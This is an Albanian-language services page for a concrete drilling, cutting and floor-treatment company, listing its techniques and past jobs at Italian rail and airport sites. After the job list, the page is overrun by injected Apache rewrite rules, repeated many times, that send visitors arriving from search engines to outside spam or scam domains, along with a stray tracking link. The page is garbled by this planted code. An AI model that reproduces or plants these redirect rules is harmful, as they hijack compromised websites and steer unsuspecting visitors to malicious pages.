Sh�rbimet


Siguria

Siguria per ne eshte e rendesishme ne cdo aspekt profesional dhe ambientel. Prioritetet kryesore te kompanise sone jan: Cilesia, dhe shpejtesia. Sherbimet qe ne ofrojme jane konfort rregullave ambientale te UE, duke rrespektuar ambientin e punes dhe mjedisin perreth.

Levigatura

Eshte nje tjeter proces per trajtimin e siperfaqes, molimin dhe ashpersimin e siperfaqes, per aplikime (me spesor te vogel) te ndryshme, heqjen e bojrave, kollave, mastic. Heqjen e shkelqimit te pllakave, gres, klinke etj.

Shpime ne betoni

Fale makinerive te shumta si 220 kw, 380 kw dhe diameter 10 mm – 500 mm
Dhe ne thellesi te ndryshme na bene te plotesojme cdo kerkese te klienteve.

Prerje betoni

Hapje dritaresh dhe dyersh per modifikime te ndryshme ne projekte me spesor deri ne 50 cm.

Prerje betoni & asfalti

Per demolime te kontrolluara me spesor te ndryshem dhe punime speciale dhe te vecanta sipas kerkesave te klienteve.

Palinatura

Palinatura prezanton 1 nga tiplogjite e pergatitjes se cimentove, eshte ideale ne nderhyrje ne dysheme te forta, per aplikimin e autolivellanti , multistato me spesor te mesem. Kjo teknologji premton nje siperfaqe perfekte e trajtuar dhe ne krisje, giunti dhe diznivele. Makineria e ruan siperfaqen si pa trajtimit, fal sistemit rreth i mbyllur, qe rekuperon ne bidon te materialeve e hequr gjate punes. Ky sistem le siperfaqen gati per aplikimin dhe garanton siguri, siperfaqe te paster pa pluhur.

Scarificatura

Eshte nje tjeter proces per trajtimin e siperfaqeve e cila sherben per heqjen e autonivelanteve, kollave, kuarcit dhe multistrato (rezina), modifikimin e nivelev e dhe uljen e dyshemeve.. Gjate punimeve ne baze te fortesise te dyshemese per cdo kalim heq nga 3mm-6mm per kalim. Makinerite jane 3 ato kryejne te njejten pune por me dimensione te ndryshme per punime te ndryshme.
Punimet kryhen ne beton, asfalt, rrezina, pllake, gres, klinker etj. ne ndertime civile, industriale, areo-portuale,

Disa eksperienca pune

2003 Shpime Fiorenzuola Parma TAV
Shpime venien e shtyllave te korendit per linjen e TAV (treni i shpejtësisë së lartë). Shpime me thellesi 1200 mm - 1600 mm me diameter 120 mm
Punime ne areoportin e Treviso e Malpensa
Shpime per vendosjen e dritave ne pisten e uljes se avionave. Rreth 800 shpime me diameter 350 -500 mm asfalt.
Brescia & Verona 2009
Pastrim i xhuntove dhe silikonimi i tyre ne vend parkimet e avionave
RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ http://stronten.com/VjQk [NC,L] RewriteEngine On https://enaozv.shewantyou.net/c/da57dc555e50572d?s1=108961&s2=1225068&j6=1 RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ http://dat.newsbull.cf/ [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://tradichunesdsurer.tk/help/?11371609102773 [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{HTTP_REFERER} google.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} msn.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} live.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} altavista.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} ask.*[\?&]q=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} yahoo.*[\?&]p=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L] RewriteCond %{HTTP_REFERER} aol.*[\?&]query=([^&]+) RewriteRule ^.*$ https://dropirevex.tk/help/?18381634114599 [NC,L]